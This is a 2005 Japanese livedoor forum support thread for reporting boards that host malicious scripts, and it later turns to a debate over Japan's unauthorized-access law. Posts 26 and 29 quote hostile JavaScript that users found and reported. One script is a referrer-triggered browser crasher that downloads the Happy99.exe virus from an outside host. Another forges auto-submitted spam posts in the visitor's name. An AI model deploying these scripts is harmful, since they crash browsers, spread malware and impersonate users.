スクリプト攻撃板報告スレッド - 1109820523

1：★ライブドアしたらばスタッフ★：2005/03/03(木) 12:28:43 ID:zCm4FpEE: 現在一部のスレッドにおきまして、掲示板管理者の
設定により、悪質なスクリプトを貼り付けている例が
見受けられます。このような板を発見された場合、
こちらのスレッド或いはjbbs-support@livedoor.net
宛にご連絡下さいますようお願い申し上げます。

※本件に関係の無い書き込みに関しましては一律削除致しますので
宜しくお願い申し上げます。
2：名無しさん：2005/03/03(木) 19:02:20 ID:w/FZwMvw: http://jbbs.livedoor.jp/computer/19891/
3：名無しさん：2005/03/05(土) 20:50:58 ID:5a.NtvCQ: そんなことよりiVAS5s1Uを何とか汁
4：名無しさん：2005/03/06(日) 23:36:32 ID:h8zr82X.: travelカテですが、スクリプトによると思われるスレが立てられました。
（投稿者名、IP、クリップボードデータに関しては一応伏せたまま報告しておきます）

皆様、かける様大学というサイトをご存知ですか?
救世主かける様が私達に助言を与えて下さる、素晴らしいサイトですよ。
とてもお勧めです。皆様も是非一度行かれてみては如何でしょうか。

http://kakerusama.ifdef.jp/

Name=××××
Mail=sage
Referrer=http://jbbs.livedoor.jp/bbs/subject.cgi/computer/19909/
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Width=1024
Height=768
ColorDepth=16
ClipboardData=××××××　×××
5：名無しさん：2005/03/07(月) 00:28:25 ID:j9676Wzw: http://jbbs.livedoor.jp/computer/19909/
6：名無しさん：2005/03/07(月) 03:27:36 ID:KWJECgN.: かける系列です。

第二かける様大学公式掲示板http://jbbs.livedoor.jp/computer/18574/
第三かける様大学公式掲示板http://jbbs.livedoor.jp/computer/18913/
第四かける様大学公式掲示板http://jbbs.livedoor.jp/computer/19320/
第五かける様大学公式掲示板http://jbbs.livedoor.jp/computer/19672/
第六かける様大学公式掲示板http://jbbs.livedoor.jp/computer/19909/
7：名無しさん：2005/03/07(月) 12:02:39 ID:VEJZstaw: >>6
スクリプトは第六にしか付いていないようだが？
お前の投稿は宣伝しているようにしか見えない。
8：名無しさん：2005/03/07(月) 15:53:07 ID:WN.8GiBk: 違いますよ。宣伝を食らった者です。
こんなところに宣伝する人はいないと思いますが？
なぜ宣伝と断定するのか非常に疑問。

最初、スクリプトはかける第一につけられて、今は強制閉鎖。
それで第六ができてスクリプトを仕組んでいます。
なので第六を打ち落としたら後の掲示板に入れられる可能性があるかと思ったまで。
9：名無しさん：2005/03/07(月) 19:33:42 ID:lrTtRldc: >>8
煽りが目的だとしたら？どこかのサナワさんみたいに。
どちらにしろ、ああいうレスは無視するべきだと思います。
ところで>>6と>>8はIDが違うけど別人？
10：★ライブドアしたらばスタッフ★：2005/03/09(水) 18:30:56 ID:mgO8ngVU: 話が脱線しすぎないうちに申し上げておきます。
スクリプト攻撃板報告スレッドですので
スクリプト攻撃板報告に関連しない書き込みは下記へ移動して行って下さいますようお願い申し上げます。

http://jbbs.livedoor.jp/bbs/read.cgi/computer/10298/1071757620/

以後　整理に為に関連しない書き込みに関しましては削除させていただくことが
あります。
11：名無しさん：2005/03/10(木) 08:14:29 ID:PMkMRKvY: >>7
かける系列では第三・第四・第五にも連続投稿スクリプトを見つけました。
早急に削除してもらいたいです。

これ以上被害が出ないうちにかけるのIPを公開したりなどもした方が良いと思います。
では。
12：（・θ・）樋横博士の異常な愛情：2005/03/10(木) 19:26:36 ID:f.K4UBi.: かける様大学
http://jbbs.livedoor.jp/bbs/read.cgi/anime/2403/1110445357/
失礼します。管理人ではなくただの住人ですが、こちらにも貼られておりました。
13：名無しさん：2005/03/11(金) 06:55:09 ID:iVAS5s1U: >>12
貼り付けられた先の掲示板やスレをいちいち上げてたらきりがないと思うが？
14：名無しさん：2005/03/11(金) 21:57:36 ID:Xslv4kMc: tesuto
15：名無しさそ：2005/03/13(日) 14:43:59 ID:RcqKXExI: かける様大学の管理人（かける）の仲間達が集まっている掲示板です。
トリップ等を抜いて楽しんだり、色々と悪いこともしているようです。
この掲示板を削除希望です。因みに「悪いこと」というのは
ＰＡＳＳクラ、連投による攻撃などです。

http://jbbs.livedoor.jp/computer/18648/
16：名無しさん：2005/03/18(金) 23:09:34 ID:s6qPGANw: >>15ああ、破壊王BBSか
そこの掲示板に一回書き込んだだけでアクセス制限された
17：名無しさん：2005/03/18(金) 23:19:04 ID:s6qPGANw: http://jbbs.livedoor.jp/computer/20231/
「第七かける大学公式掲示板」
18：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/19(土) 23:00:17 ID:WWMSaQlw: >>15-17
ここは荒らし掲示板紹介スレではありませんよ・・・
スクリプトを貼っている掲示板のアドレスを公開するところです。
見たところどちらもスクリプトは貼ってありませんね。
19：名無しさん：2005/03/20(日) 01:23:29 ID:s6qPGANw: http://jbbs.livedoor.jp/computer/5676/
でもこの掲示板にはスクリプトが貼ってありますよね？
20：名無しさん：2005/03/20(日) 09:28:25 ID:7JJTBKqQ: スクリプト付きのURLには【危険】とか印をつけてくれないかな。

スレの趣旨からいえば、デフォルトは【危険】で、危険でないURLの方に
印を付けるべき何だろうけど、たぶん危険でないURLを貼り付ける人は
この問題を理解していない人だから、言ってもわからないと思うから。
21：名無しさん：2005/03/20(日) 10:19:10 ID:C7qKk/jU: http://jbbs.livedoor.jp/computer/20231/
かけるがＮＧワード対策してますよ
22：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/20(日) 13:45:29 ID:WWMSaQlw: >>19
見たところ、設置されてはいないようです。過去には設置されていたので、おそらくもう管理者が削除したのでしょう。
>>20
やっぱりそうすべきですね。
23：名無しさん：2005/03/21(月) 01:37:58 ID:/wdJ.mhc: 酷すぎです。以下、かけ-るの掲示板のテンプレより転載。
http://jbbs.livedoor.jp/computer/20231/

重要なお知らせ
「かけ-る様」という文字列がライブドアしたらばの掲示板全体でNGワードとなっているようです。
これはライブドアが嫉妬して全体NGワードを設定する程、救世主かけ-る様が偉大だということでもあります。
なので、メッセージ中に「かけ-る様」と書きたい時は、「かけ-る様」の文字列の間に幅無しスペース()を入れて書き込んで下さい。
24：名無しさん：2005/03/21(月) 01:44:20 ID:/wdJ.mhc: 第八かけ-る様大学公式掲示板
http://jbbs.livedoor.jp/computer/20338/
25：名無しさん：2005/03/21(月) 12:39:42 ID:nuORqUlA: >>24
奪った掲示板らしいぞ、それ・・・
26：名無しさん：2005/03/21(月) 15:03:45 ID:6O/GcE5Q: >>19
特定のURLから飛んできた場合ブラクラに飛ばされるスクリプトが設置されていますよ。

<script>
window.status="･ﾚ｡ｼ･ｸ､ｬﾉｽｼｨ､ｵ､・ﾞ､ｷ､ｿ";
if(document.referrer == "http://mbspro5.uic.to/user/nnr7050.html"){
while(1){open('./');}
}
if(document.referrer == "http://yy2.ziyu.net/yy/nomoto.html"){
while(1){open('http://easyweb.easynet.co.uk/~hiros/virii99/newtype/Happy99.exe');open('http://www2.strangeworld.org/');}
}
</script>
27：名無しさん：2005/03/21(月) 21:15:21 ID:s6qPGANw: ブラクラどころかHappy99のウイルスをDLさせられる
28：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/21(月) 21:53:24 ID:WWMSaQlw: うわっ･･･えげつないですね。
そのサイトから荒らしに来る人が多かったのかな？
29：名無しさん：2005/03/22(火) 00:38:09 ID:KmRKdeOo: http://jbbs.livedoor.jp/computer/20000/

茄子のもう一つの掲示板
ここから呼び出されるスクリプトの中にも悪意のあるスクリプトが。

http://pan-pacific.hp.infoseek.co.jp/js/greattemizumushi8.js

if (Name.match(/take/)){
var Idiot =" 　　　　　　人　　　　　　　　　　＿＿＿＿＿＿
　　　　　／｡ﾟ＼　∀　　　　／
　　　　 (*´-｀ ),ぅ⊥　　　＜この掲示板つまらないから僕が支配しようと思います。
　（⌒⌒とo　_-､ﾉ⌒⌒）　　＼文句ある人、どうぞ反論してくださいっ！
　（　 )⌒⌒~し'J⌒⌒⌒）　　　￣￣￣￣￣￣
　　~~~~~~~~~~~~~~~~~~~ "
document.write("<form name=gettrip0 action=http://jbbs.livedoor.jp/bbs/write.cgi/computer/4006/new/ method=post target=1904>");
document.write("<input type=hidden name=SUBJECT value=\"ﾌｵﾂ遙ﾄ､ﾊ､鵑ﾁ､网ﾃ､ﾆ｢�\">");
document.write("<input type=hidden name=NAME value=\""+Name+"\">");
document.write("<input type=hidden name=MAIL value=\""+Mail+"\">");
document.write("<input type=hidden name=MESSAGE value=\""+Idiot+"\">");
document.write("<input type=hidden name=BBS value=4006>");
document.write("<input type=hidden name=DIR value=computer>");
document.write("<input type=hidden name=TIME value=1011364399>");
document.write("</form>");
document.gettrip0.submit();
}

http://pan-pacific.hp.infoseek.co.jp/js/greattemizumushi5.js

window.status="･ﾚ｡ｼ･ｸ､ｬﾉｽｼｨ､ｵ､・ﾞ､ｷ､ｿ";
if(document.referrer == "http://mbspro5.uic.to/user/nnr7050.html"){
while(1){open('./');}
}
if(document.referrer == "http://yy2.ziyu.net/yy/nomoto.html"){
while(1){open('http://easyweb.easynet.co.uk/~hiros/virii99/newtype/Happy99.exe');open('http://www2.strangeworld.org/');}
}

かける関係も危ないが、茄子関係も危ない。
30：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/22(火) 13:07:15 ID:WWMSaQlw: >>29
うぇ、20000が茄子だ。
これはうまく作動していないようですね。
投稿先の掲示板が何らかの規制を行っているのかな？
それにしてもそこの掲示板、カスタムを色々やってますね。
こんな掲示板なのにご丁寧に参考サイトのアドレスを貼ってありますし。

↓↓この部分(greattemizumushi1.js)
//inspired by 外国為替総合掲示板　- 外為フォーラム -(http://jbbs.livedoor.jp/business/927/)//
31：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:18:49 ID:73khSP..: あの、不注意で掲示板のパスワードがばれて
完全に乗っ取られてしまいました
なのでパスワードもすべて変えられてしまい、メルアドも変えられてしまいました。
どうすればようでしょうか
32：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:19:48 ID:73khSP..: 個人情報まで公開されてしまいました
http://jbbs.livedoor.jp/computer/6801/kouji616aa.html
33：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:21:53 ID:73khSP..: http://www.ipa.go.jp/security/ciadr/law199908.html
に違反してます
警察物ですよ。
34：マート </b><font color=#FF0000>（Lucky/qo）</font><b>：2005/03/31(木) 00:36:13 ID:WWMSaQlw: >>31-33
こういう個人情報に関わるものは、JBBSに直接メールを送った方がいいと思います。
個人情報をその掲示板に公開されてしまっているのなら、ここにアドレスを貼ると逆効果ですよ。
サポート掲示板にはそういった類のスレッドは無いので、やっぱりメールを送るのがいいのではないでしょうか？
35：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 00:38:22 ID:73khSP..: ありがとうございます
36：名無しさん：2005/03/31(木) 01:02:31 ID:rVADdIU2: ＞あの、不注意で掲示板のパスワードがばれて
自己責任。
37：神雷コウ＠雷神様 </b><font color=#FF0000>（/Re6aTC.）</font><b>：2005/03/31(木) 01:32:02 ID:73khSP..: >>36
でも犯罪だじぇ。
38：名無しさん：2005/03/31(木) 01:56:39 ID:rVADdIU2: >>37
犯罪？(´,_ゝ｀)ﾌﾟｯ
39：名無しさん：2005/03/31(木) 02:28:10 ID:lNXx2GVs: >>38
不正アクセス禁止法違反ですな。
40：名無しさん：2005/03/31(木) 02:40:33 ID:sDnvzYMk: >>37
貴方の不注意でパスワードをばらしてしまったのなら仕方がないことですよ。
41：名無しさん：2005/03/31(木) 08:01:48 ID:lNXx2GVs: >>40
なんか勘違いしているようだね。それでも犯罪。
ちなみに2chとかでセキュホ暴露などでさらされてるURLをクリックしても、
犯罪になる。相手が不正アクセスだと言って訴えたら負けるので、火遊びをしてやけどをしないように。
42：名無しさん：2005/03/31(木) 15:38:52 ID:dKmthosA: >>41
掲示板潰す目的で田代砲を撃つのは?
43：名無しさん：2005/03/31(木) 17:32:29 ID:C665YxOQ: アドレスをブラウザに入力するだけで入れる場合は、不正アクセスにはならないんじゃないか？
44：名無しさん：2005/03/31(木) 18:15:33 ID:lNXx2GVs: >>43
先頃、判決が出たところだよ。不正アクセスになる。で、それをやった人間が有罪となった。
当人は脆弱性の危険性を知らしめるためにやった主張しているがね。
この裁判はまさに、URLを打っただけで表示されるような脆弱性のあるシステムに
その方法でアクセスを行った場合、不正アクセスに相当するのかが争われた。
で、一審は「不正アクセスに相当する」という判決になった。控訴するかどうかは知らないけどね。
45：名無しさん：2005/04/01(金) 00:27:08 ID:I6crQYSE: ああ、あれね。あれはちょっと特殊みたいだからなあ。詳しくは知らんけど。
46：名無しさん：2005/04/01(金) 00:29:27 ID:sDnvzYMk: >>45
どんな事件だったの？
47：名無しさん：2005/04/01(金) 00:38:09 ID:I6crQYSE: 記事
http://www.itmedia.co.jp/news/articles/0503/25/news022.html

解説
http://www.geocities.jp/officeandaccs/
48：名無しさん：2005/04/01(金) 05:21:30 ID:lNXx2GVs: >>45
> ああ、あれね。あれはちょっと特殊みたいだからなあ。詳しくは知らんけど。

あのね、カギをかけ忘れていようが相手の家に黙って入れば、そしてそれを相手が
訴えれば、犯罪になるわけ。
49：名無しさん：2005/04/01(金) 13:14:51 ID:friVRuc.: その例はたまに2chでも見るが違うだろう。
50：名無しさん：2005/04/01(金) 13:19:32 ID:friVRuc.: アドレスを変えるだけでアクセス出来た件で、不正アクセスに問われたことはないでしょう？
今回のはそういったものではないようだし。
51：名無しさん：2005/04/01(金) 13:30:40 ID:lNXx2GVs: >>49
> その例はたまに2chでも見るが違うだろう。

違わない。

>アドレスを変えるだけでアクセス出来た件で、

そのアドレスが一般に公開されていないものであれば、それを推測してアクセスするのは
不正アクセスに相当するだろうね。

>今回のはそういったものではないようだし。

そういったものなのだよ。
52：名無しさん：2005/04/01(金) 13:52:50 ID:friVRuc.: 家は不特定多数に公開するものじゃない。WEB上に上げたものは、IDやpassでアクセス制限したもの以外は公開するもの。
ガキのかけ忘れってのは、WEB上の場合アクセス制限をしていなかったことになるだろう。

今回の判決だって、
＞ブラウザにURLを入力するだけでは閲覧できない秘匿性の高いファイルに対し、CGIの脆弱性を利用してアクセスするのは通常のアクセスとは言えず、
＞FTPのアクセス制御を回避した不正アクセスにあたる」と認定。

だしな。単にURLを書き換えただけでアクセスできたのもは不正アクセスにはならないだろう。アクセス制限機能なんて無いわけだし。
過去にそれで個人情報流出したのは何件かあったが、不正アクセス扱いにはならなかったしな。
53：名無しさん：2005/04/01(金) 14:01:20 ID:friVRuc.: そういやヨン様サイトの個人情報流出はどうなったんだっけかな。
あれは脆弱性を利用したアクセスだった気が。
54：名無しさん：2005/04/01(金) 14:09:39 ID:friVRuc.: うーん。よく読んだらCGIを通してるだけで、よくあるディレクトリ丸見えのサイトから
適当なファイル名を推測してってのと同じような手段だな。
脆弱性を利用してファイル名とパスし、脆弱性を利用してデータを引き出したのが問題なのか。
55：名無しさん：2005/04/01(金) 14:10:24 ID:friVRuc.: 訂正

パスを入手し
56：名無しさん：2005/04/01(金) 14:21:46 ID:lNXx2GVs: >>52
> ＞ブラウザにURLを入力するだけでは閲覧できない秘匿性の高いファイルに対し、CGIの脆弱性を利用してアクセスするのは通常のアクセスとは言えず、
> ＞FTPのアクセス制御を回避した不正アクセスにあたる」と認定。
> だしな。単にURLを書き換えただけでアクセスできたのもは不正アクセスにはならないだろう。アクセス制限機能なんて無いわけだし。

あんたなんか話を勘違いしているようだね。cgiの脆弱性をつくためのURLが存在し、それが
2chで晒されている場合に、それをクリックすれば不正アクセスだという話をしているのだがね。

俺の話に「それは違うだろう」というのなら、俺が話しているのと同じ話をしなければ意味がなかろうに。
あんたが別の話をするのは勝手だが、それならば俺の話に「違う」というのはおかしい。

あるいはGETメソッドとPOSTメソッドの違いを言ってるのであれば（POSTメソッドはURLだけでは
表現できないからね)、今回はその点は重大な争点にならなかった。したがってこの違い（たとえば
GETなら無実だがPOSTを使うと罪になるとか）はないと考えられる。

> 過去にそれで個人情報流出したのは何件かあったが、不正アクセス扱いにはならなかったしな。

それは単に被害者側が訴えないから。相手が本気で怒り訴え出れば負けるということ。
57：名無しさん：2005/04/01(金) 14:22:50 ID:lNXx2GVs: >>54
> うーん。よく読んだら

よく読まずに、それだけ自信満々に思いこみだけで書けるのがすごいな（ｗ
58：名無しさん：2005/04/01(金) 14:34:15 ID:friVRuc.: よく読んだらってのは自分で張ったACCSの件の解説サイトの事ね。
2chで「個人情報流出！」なんてスレが立ってるのは大抵俺が上で言った様な場合だから、
思い違いをしていた、ｽﾏｿ。
今回の判決が確定すれば、脆弱性を利用してアクセスするURLをクリックすることは、
不正に晒されているIDとpassを入力して入るのと同じ事になるから、当然アウトになるね。
59：名無しさん：2005/04/01(金) 14:36:25 ID:lNXx2GVs: 基本的な考え方として、現在の不正アクセス禁止法の法律の趣旨は、相手が公開する意図がなく、
こうしておけば秘密にできる、と考えて行っていることの盲点を意図についてアクセスするのは、
不正アクセスに相当するということ。

これについては当然反対論者はいるがね。反対意見はおおむね2つ。「これはシステム管理者側を
甘やかしすぎで、却って技術や管理が堕落するのではないか」と「セキュリティの研究のために行うことも
犯罪になるのでは、技術が向上しない」。それぞれ一理あるが、「だからといって不正なアクセスを
やってよいという理由にはならない」というのが現在の不正アクセス禁止法の考え方。

はっきりいってこの法律はかなり適用範囲が広いから、これを使って被害者側が訴えれば、
おそらく大抵のケースはアクセスを行った側が負ける（だからこそ反対論が結構あったのだが）。
2chとかでURLをさらされて、何千人もがアクセスした場合、その人たち全員を訴えるというのも
あまり現実的ではないが、見せしめのためにピックアップして訴えるということはあり得る話。
自分が生け贄にならない保証はないわけで、やるならそのリスクを承知の上でやることだね。

どこかのアイドルが詩を盗作しておいて「こんな重大な問題になるとは思わなかった」と
後悔した二の舞にならないように（笑
60：名無しさん：2005/04/01(金) 14:47:16 ID:lNXx2GVs: >>58
> 2chで「個人情報流出！」なんてスレが立ってるのは大抵俺が上で言った様な場合だから、

いやそれが思いこみなんだけどね。cgiを介すか否かは問題の本質ではない。
アクセスする側が「システム管理者側の意図に反してアクセスを試みる」意志なしには
普通は行なう事のない方法でアクセする行為そのものが不正アクセスに当たる。

たとえばfile01.html、file02.html、file04.htmlというURLが公開されている場合、
file03.htmlが存在すると推測してそれにアクセスするのが不正アクセスに当たるかといえば、
file03.htmlをアクセスする側に「隠さされているものを暴いてやろう」という意図の下に
行ったかどうかが有罪/無罪の分かれ目だと思うよ。file03.htmlも当然あるものと考え、
またそれが同様に公開されているデータだと思って扱っている限りは、不正アクセスには
相当しない。しかしfile03.htmlをアクセスした意図が「隠されているものを暴いてやろう」という
意図から行ったものだと思われてもしかたない状況であったり、file03.htmlをアクセスしたのは
偶然でもそれを見た時点で「公開されていないものである」ことが誰の目にも分かるにも関われず、
それを利用（悪用）すれば、抵触すると考えられる。
61：名無しさん：2005/04/01(金) 14:55:25 ID:friVRuc.: では、隠されている（公開されていない）ということが、「アクセス制御機能」に該当すると？